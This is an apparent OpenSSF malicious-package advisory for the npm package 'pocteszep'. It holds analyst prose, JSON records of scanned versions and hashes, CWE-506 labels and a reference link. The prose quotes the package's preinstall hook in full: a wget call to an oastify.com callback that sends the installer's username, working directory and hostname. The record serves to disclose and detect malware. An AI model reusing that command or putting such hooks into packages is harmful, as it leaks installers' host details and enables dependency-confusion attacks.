-= Per source details. Do not edit below this line.=-
The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.
The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
{
"malicious-packages-origins": [
{
"modified_time": "2026-06-11T02:10:39Z",
"sha256": "0928ae3dd121de41479d98b831bdff705eb1e0e5960a60863c22fc844749fdae",
"versions": [
"1.0.5"
],
"import_time": "2026-06-11T02:24:28.772851114Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-005379"
},
{
"source": "amazon-inspector",
"sha256": "49e809bf95413ac0d2235c8a4abf33b3b2121af7e3b8fc2393e077c04ae28fdc",
"import_time": "2026-06-11T02:24:27.503226582Z",
"modified_time": "2026-06-11T01:42:16Z",
"id": "IN-MAL-2026-005356",
"versions": [
"1.0.1"
]
},
{
"source": "amazon-inspector",
"sha256": "a469c97969991b78ee0e28cc8e4a43d14750da0d4e3d4519f6e21263c9143a8f",
"import_time": "2026-06-11T02:24:28.811952768Z",
"modified_time": "2026-06-11T02:10:39Z",
"id": "IN-MAL-2026-005380",
"versions": [
"1.0.5"
]
},
{
"source": "amazon-inspector",
"sha256": "c146870dfd2759e9e7b37a0c37783c40dbc35ebbf4e2145c1763dacc0b1d9e9f",
"import_time": "2026-06-11T02:24:28.710852245Z",
"modified_time": "2026-06-11T02:09:54Z",
"id": "IN-MAL-2026-005378",
"versions": [
"1.0.4"
]
},
{
"import_time": "2026-06-11T02:24:28.108549031Z",
"sha256": "c559e1ff2e96350c1eb7bc1c091c250b5860a7712fa7b99bbfb8762910190af7",
"modified_time": "2026-06-11T01:52:26Z",
"versions": [
"1.0.0"
],
"id": "IN-MAL-2026-005366",
"source": "amazon-inspector"
},
{
"source": "amazon-inspector",
"sha256": "e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d",
"import_time": "2026-06-11T02:24:28.868274594Z",
"modified_time": "2026-06-11T02:11:12Z",
"id": "IN-MAL-2026-005381",
"versions": [
"1.0.2"
]
},
{
"versions": [
"1.0.1"
],
"sha256": "f0ba0d9e403509d779b0247843e7f8994a4caae4b7fe43f41192ff708a07d4cf",
"import_time": "2026-06-11T02:24:27.429865006Z",
"modified_time": "2026-06-11T01:42:15Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-005355"
},
{
"sha256": "1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00",
"versions": [
"1.0.2"
],
"import_time": "2026-06-11T02:24:24.877314502Z",
"source": "ossf-package-analysis",
"modified_time": "2026-06-11T01:50:49Z"
},
{
"modified_time": "2026-06-11T01:52:26Z",
"sha256": "384556848b90af0dc3c06aef498f7c87a97a47c2491454a572ac1a79b197bd14",
"versions": [
"1.0.0"
],
"import_time": "2026-06-11T02:24:28.151205845Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-005367"
},
{
"versions": [
"1.1.1"
],
"sha256": "6c17d0010de4934b20768fdda3f2a6001bfadb3f0e5641a089bd76e40d76a545",
"import_time": "2026-06-11T03:48:44.440462781Z",
"modified_time": "2026-06-11T02:47:53Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-005383"
},
{
"source": "amazon-inspector",
"sha256": "818829f44b80e58e20516cb4ebb5945e3fe8ab8d1118b23224c0f9b116fa5e16",
"import_time": "2026-06-11T03:48:44.588143806Z",
"modified_time": "2026-06-11T02:47:57Z",
"id": "IN-MAL-2026-005384",
"versions": [
"1.0.8"
]
},
{
"id": "IN-MAL-2026-005382",
"sha256": "8744fc71275199a30d2b5559e2f3013e057e4ae859cce0bba676bfd0a9da6e72",
"modified_time": "2026-06-11T02:47:53Z",
"versions": [
"1.1.1"
],
"source": "amazon-inspector",
"import_time": "2026-06-11T03:48:44.343856533Z"
},
{
"sha256": "f84a31af681abb09ee482c9bc1ed642077c36f2e92d1d62325d66a6ca2aabded",
"import_time": "2026-06-11T03:48:40.164681824Z",
"modified_time": "2026-06-11T02:30:41Z",
"source": "ossf-package-analysis",
"versions": [
"1.1.1"
]
}
]
}[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"package_integrity": [
{
"filename": "pocteszep-1.0.5.tgz",
"hashes": {
"sha1": "9121f340ed270ac453b4249520bb526d0b5f2e6b",
"sha512_sri": "sha512-QyfT9wrpsBiF3vl6KdmKTaXfTm4AOn5h9vv33pYZFjpCG5xbCgO5LHFwRqpiX8X8ASVONS3ie7K9/LRXmea3YA=="
}
}
],
"evidence_files": [
{
"tlsh": "ae01cb24a026e9733dc54df7207c0357ae21bed74242ac1cbaf3110c121d9a620b8215",
"sha256": "f14b2bd3158932ef9add6c786b948b952c16358e84df3930f467d9faba5bf2ca",
"path": "package.json"
}
],
"domains": [
"z11f95fv69kjc0s88ex6l1f04raiyamz.oastify.com"
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pocteszep/MAL-2026-5544.json"